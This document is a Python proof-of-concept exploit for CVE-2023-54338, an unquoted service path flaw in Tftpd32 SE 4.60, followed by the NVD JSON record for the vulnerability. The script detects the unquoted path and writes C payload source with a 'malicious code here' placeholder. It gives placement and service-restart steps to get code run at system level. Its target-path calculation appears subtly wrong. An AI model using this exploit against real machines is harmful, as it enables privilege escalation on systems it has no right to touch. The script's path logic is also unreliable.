CVE-2023-54338

# CVE-2023-54338 PoC - Unquoted Service Path Exploitation # This PoC demonstrates how to exploit the unquoted service path vulnerability in Tftpd32 SE import os import subprocess import sys def check_vulnerable_service(): """Check if Tftpd32 SE service exists and has unquoted path""" try: # Query service configuration using sc command result = subprocess.run( ['sc', 'qc', 'Tftpd32SE'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: # Extract the path and check if it's unquoted for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() if not path.startswith('"') and ' ' in path: print(f"[+] Vulnerable unquoted path detected: {path}") return path else: print(f"[-] Path is properly quoted or no spaces") return None else: print("[-] Tftpd32SE service not found") return None except Exception as e: print(f"[-] Error checking service: {e}") return None def create_payload(payload_path): """Create a malicious executable to place in the unquoted path""" # This would be replaced with actual malicious code in real attack # For demonstration, create a simple executable malicious_code = f''' #include <windows.h> #include <stdio.h> int main() {{ printf("CVE-2023-54338 exploited!\\n"); // Add malicious code here MessageBox(NULL, "System compromised via Tftpd32 SE!", "Exploit", MB_OK); return 0; }} ''' # Write the source code with open('exploit.c', 'w') as f: f.write(malicious_code) # Compile with mingw or similar (requires compiler) print(f"[*] Payload source written to exploit.c") print(f"[*] Compile and place at: {payload_path}") print(f"[*] Then restart the service: sc stop Tftpd32SE && sc start Tftpd32SE") def main(): print("=== CVE-2023-54338 Unquoted Service Path PoC ===\n") # Step 1: Check if vulnerable vulnerable_path = check_vulnerable_service() if vulnerable_path: # Step 2: Calculate the target path for placing malicious executable # Extract directory before the service executable name path_parts = vulnerable_path.split(' ') if len(path_parts) >= 2: # The directory containing spaces target_dir = ' '.join(path_parts[:-1]) # The name that will be used as the malicious executable malicious_name = path_parts[-1].split('.')[0] + '.exe' target_path = os.path.join(target_dir, malicious_name) print(f"\n[*] Target path for malicious executable: {target_path}") create_payload(target_path) else: print("\n[-] Target is not vulnerable or service not found") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2023-54338", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:16:01.593", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tftpd32 SE 4.60 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious executables that will be run with system-level permissions."}, {"lang": "es", "value": "Tftpd32 SE 4.60 contiene una vulnerabilidad de ruta de servicio sin comillas que permite a atacantes locales ejecutar potencialmente código arbitrario con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas en la configuración del servicio para inyectar ejecutables maliciosos que se ejecutarán con permisos a nivel de sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://pjo2.github.io/tftpd64/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51076", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/tftpdse-tftpdsvc-unquoted-service-path", "source": "[email protected]"}]}}